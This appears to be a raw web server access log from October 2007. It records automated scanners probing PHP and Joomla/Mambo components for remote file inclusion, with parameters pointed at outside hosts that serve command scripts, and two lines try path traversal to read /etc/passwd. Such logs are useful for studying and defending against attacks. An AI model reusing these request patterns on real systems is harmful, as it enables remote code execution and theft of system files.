203.157.182.9 - - [28/Oct/2007:14:53:37 -0700] "GET /logs/access_070820.log/index.php?pag=http://www.feuerwehr-erolzheim.de/contenido445/contenido/classes/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.157.182.9 - - [28/Oct/2007:14:53:43 -0700] "GET /index.php?pag=http://www.feuerwehr-erolzheim.de/contenido445/contenido/classes/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.157.182.9 - - [28/Oct/2007:14:53:49 -0700] "GET /logs/index.php?pag=http://www.feuerwehr-erolzheim.de/contenido445/contenido/classes/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.193.22.253 - - [28/Oct/2007:14:54:57 -0700] "GET /logs/access_070820.log//index.php?go=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.193.22.253 - - [28/Oct/2007:14:54:57 -0700] "GET //index.php?go=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.193.22.253 - - [28/Oct/2007:14:54:57 -0700] "GET /logs//index.php?go=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.237.163.171 - - [28/Oct/2007:14:54:59 -0700] "GET /logs/map.php?loc=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
80.237.163.171 - - [28/Oct/2007:14:54:59 -0700] "GET /map.php?loc=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
80.237.163.171 - - [28/Oct/2007:14:55:16 -0700] "GET /logs/module_db.php?pivot_path=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "galf.org"
80.237.163.171 - - [28/Oct/2007:14:55:17 -0700] "GET /module_db.php?pivot_path=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "galf.org"
67.19.131.238 - - [28/Oct/2007:14:55:25 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:55:31 -0700] "GET /logs/access_070826.log/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
211.233.38.51 - - [28/Oct/2007:14:55:31 -0700] "GET /index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:55:31 -0700] "GET /logs/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
211.233.38.51 - - [28/Oct/2007:14:55:51 -0700] "GET /logs/access_070826.log/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:55:51 -0700] "GET /index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:55:51 -0700] "GET /logs/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.127.76.96 - - [28/Oct/2007:14:55:57 -0700] "GET /logs/access_070716.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
216.127.76.96 - - [28/Oct/2007:14:55:57 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
216.127.76.96 - - [28/Oct/2007:14:56:00 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
66.118.142.56 - - [28/Oct/2007:14:56:19 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.118.142.56 - - [28/Oct/2007:14:56:19 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
211.233.38.51 - - [28/Oct/2007:14:56:48 -0700] "GET /logs/access_070826.log/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
211.233.38.51 - - [28/Oct/2007:14:56:48 -0700] "GET /index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:56:48 -0700] "GET /logs/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.72.112.110 - - [28/Oct/2007:14:57:00 -0700] "GET /logs//login.php?dir=http://rh4m4.t35.com/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
64.72.112.110 - - [28/Oct/2007:14:57:01 -0700] "GET //login.php?dir=http://rh4m4.t35.com/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
70.85.76.18 - - [28/Oct/2007:14:57:24 -0700] "GET /logs/index.php?id=http://www.khabox.net/images/lol.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
70.85.76.18 - - [28/Oct/2007:14:57:27 -0700] "GET /index.php?id=http://www.khabox.net/images/lol.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
80.237.163.171 - - [28/Oct/2007:14:57:29 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
80.237.163.171 - - [28/Oct/2007:14:57:30 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
211.233.38.51 - - [28/Oct/2007:14:58:17 -0700] "GET /logs/access_070826.log/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
211.233.38.51 - - [28/Oct/2007:14:58:17 -0700] "GET /index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:58:17 -0700] "GET /logs/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
169.207.64.5 - - [28/Oct/2007:14:58:39 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
169.207.64.5 - - [28/Oct/2007:14:58:40 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.72.112.110 - - [28/Oct/2007:14:58:40 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://djcuc.altervista.org/djfelix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
64.72.112.110 - - [28/Oct/2007:14:58:40 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://djcuc.altervista.org/djfelix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
216.127.76.96 - - [28/Oct/2007:14:59:00 -0700] "GET /logs/access_070820.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63"
195.201.109.6 - - [28/Oct/2007:14:59:03 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mascotaperdida.com/old/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
169.207.64.5 - - [28/Oct/2007:15:00:36 -0700] "GET /logs/access_070903.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.193.22.253 - - [28/Oct/2007:15:00:37 -0700] "GET /logs/access_070716.log//index.php?go=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.65.10.134 - - [28/Oct/2007:15:02:24 -0700] "GET /logs/scripts.log/index.php3?aide=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.65.10.134 - - [28/Oct/2007:15:02:25 -0700] "GET /index.php3?aide=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.65.10.134 - - [28/Oct/2007:15:02:25 -0700] "GET /logs/index.php3?aide=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.30.123 - - [28/Oct/2007:15:02:50 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.30.123 - - [28/Oct/2007:15:02:50 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.19.131.238 - - [28/Oct/2007:15:04:03 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.19.131.238 - - [28/Oct/2007:15:04:03 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.127.76.96 - - [28/Oct/2007:15:05:15 -0700] "GET /logs/access_070723.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
216.127.76.96 - - [28/Oct/2007:15:05:16 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
216.127.76.96 - - [28/Oct/2007:15:05:16 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63"
169.207.64.5 - - [28/Oct/2007:15:05:28 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
169.207.64.5 - - [28/Oct/2007:15:05:28 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
67.19.131.238 - - [28/Oct/2007:15:05:35 -0700] "GET /logs/access_070723.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.19.131.238 - - [28/Oct/2007:15:05:42 -0700] "GET /logs/access_070716.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
169.207.64.5 - - [28/Oct/2007:15:05:48 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
169.207.64.5 - - [28/Oct/2007:15:05:48 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.25.30.123 - - [28/Oct/2007:15:06:13 -0700] "GET /logs/module_db.php?pivot_path=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
85.25.30.123 - - [28/Oct/2007:15:06:13 -0700] "GET /module_db.php?pivot_path=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
80.237.163.171 - - [28/Oct/2007:15:08:48 -0700] "GET /logs/access_070723.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
80.237.163.171 - - [28/Oct/2007:15:08:49 -0700] "GET /logs/access_070716.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
70.85.76.18 - - [28/Oct/2007:15:09:34 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.khabox.net/images/lol.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
70.85.76.18 - - [28/Oct/2007:15:09:34 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.khabox.net/images/lol.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
67.19.131.238 - - [28/Oct/2007:15:09:35 -0700] "GET /logs/access_071008.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.19.131.238 - - [28/Oct/2007:15:09:35 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.19.131.238 - - [28/Oct/2007:15:09:35 -0700] "GET /logs/access_070709.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.19.131.238 - - [28/Oct/2007:15:09:51 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
67.19.131.238 - - [28/Oct/2007:15:09:51 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
67.19.131.238 - - [28/Oct/2007:15:11:11 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.19.131.238 - - [28/Oct/2007:15:11:11 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.30.123 - - [28/Oct/2007:15:11:52 -0700] "GET /logs/map.php?loc=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.30.123 - - [28/Oct/2007:15:11:53 -0700] "GET /map.php?loc=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
70.85.76.18 - - [28/Oct/2007:15:12:29 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.khabox.net/images/lol.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "galf.org"
70.85.76.18 - - [28/Oct/2007:15:12:30 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.khabox.net/images/lol.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "galf.org"
211.233.38.51 - - [28/Oct/2007:15:12:51 -0700] "GET /logs/access_070826.log/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:15:12:51 -0700] "GET /index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:15:12:51 -0700] "GET /logs/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
204.11.234.20 - - [28/Oct/2007:15:13:11 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.234.20 - - [28/Oct/2007:15:13:11 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.234.20 - - [28/Oct/2007:15:13:11 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
204.11.234.20 - - [28/Oct/2007:15:13:12 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.234.20 - - [28/Oct/2007:15:13:12 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.234.20 - - [28/Oct/2007:15:13:13 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.234.20 - - [28/Oct/2007:15:13:13 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.234.20 - - [28/Oct/2007:15:13:13 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
86.120.49.2 - - [28/Oct/2007:15:13:26 -0700] "GET /logs//mcf.php?content=? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.120.49.2 - - [28/Oct/2007:15:14:56 -0700] "GET /logs//mcf.php?content=? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.237.163.171 - - [28/Oct/2007:15:15:26 -0700] "GET /logs/access_070903.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
207.45.176.234 - - [28/Oct/2007:15:15:42 -0700] "GET /logs/index.php3?id=http://www.urjb.com/photos/albums/userpics/10001/thumb_blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.45.176.234 - - [28/Oct/2007:15:15:43 -0700] "GET /index.php3?id=http://www.urjb.com/photos/albums/userpics/10001/thumb_blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
203.157.182.9 - - [28/Oct/2007:15:16:48 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.feuerwehr-erolzheim.de/contenido445/contenido/classes/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.127.76.96 - - [28/Oct/2007:15:17:25 -0700] "GET /logs/access_070826.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63"
203.157.182.9 - - [28/Oct/2007:15:17:43 -0700] "GET /logs/access_070806.log/index.php?pag=http://www.feuerwehr-erolzheim.de/contenido445/contenido/classes/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.169.128.26 - - [28/Oct/2007:15:18:34 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.128.26 - - [28/Oct/2007:15:18:34 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
67.19.131.238 - - [28/Oct/2007:15:18:51 -0700] "GET /logs/access_070826.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.237.163.171 - - [28/Oct/2007:15:18:56 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
67.19.131.238 - - [28/Oct/2007:15:19:07 -0700] "GET /logs/access_071001.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://udplink.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
217.29.150.126 - - [28/Oct/2007:15:19:21 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.29.150.126 - - [28/Oct/2007:15:19:21 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
86.120.49.2 - - [28/Oct/2007:15:21:06 -0700] "GET /logs//mcf.php?content=? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.120.49.2 - - [28/Oct/2007:15:21:23 -0700] "GET /logs//mcf.php?content=? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
217.29.150.126 - - [28/Oct/2007:15:21:25 -0700] "GET /logs/access_070716.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.29.150.126 - - [28/Oct/2007:15:21:26 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.29.150.126 - - [28/Oct/2007:15:21:26 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.29.150.126 - - [28/Oct/2007:15:21:26 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.29.150.126 - - [28/Oct/2007:15:21:26 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
86.120.49.2 - - [28/Oct/2007:15:21:28 -0700] "GET /logs//mcf.php?content=? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.29.150.126 - - [28/Oct/2007:15:21:32 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.29.150.126 - - [28/Oct/2007:15:21:32 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.29.150.126 - - [28/Oct/2007:15:21:38 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.29.150.126 - - [28/Oct/2007:15:21:39 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.29.150.126 - - [28/Oct/2007:15:21:40 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.29.150.126 - - [28/Oct/2007:15:21:40 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.29.150.126 - - [28/Oct/2007:15:21:53 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
217.29.150.126 - - [28/Oct/2007:15:21:53 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.29.150.126 - - [28/Oct/2007:15:22:11 -0700] "GET /logs/access_070716.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.29.150.126 - - [28/Oct/2007:15:22:11 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.29.150.126 - - [28/Oct/2007:15:22:12 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.58.161.133 - - [28/Oct/2007:15:22:35 -0700] "GET /logs/access_070924.log//oneadmin/config.php?path[docroot]=http://e-golld.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.55.208.229 - - [28/Oct/2007:15:22:54 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.229 - - [28/Oct/2007:15:22:54 -0700] "GET /labia/?M=D HTTP/1.0" 200 508 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.229 - - [28/Oct/2007:15:22:54 -0700] "GET /labia/?D=D HTTP/1.0" 200 508 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
217.65.10.134 - - [28/Oct/2007:15:23:14 -0700] "GET /logs/access_071008.log/index.php3?aide=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.11.234.20 - - [28/Oct/2007:15:23:26 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
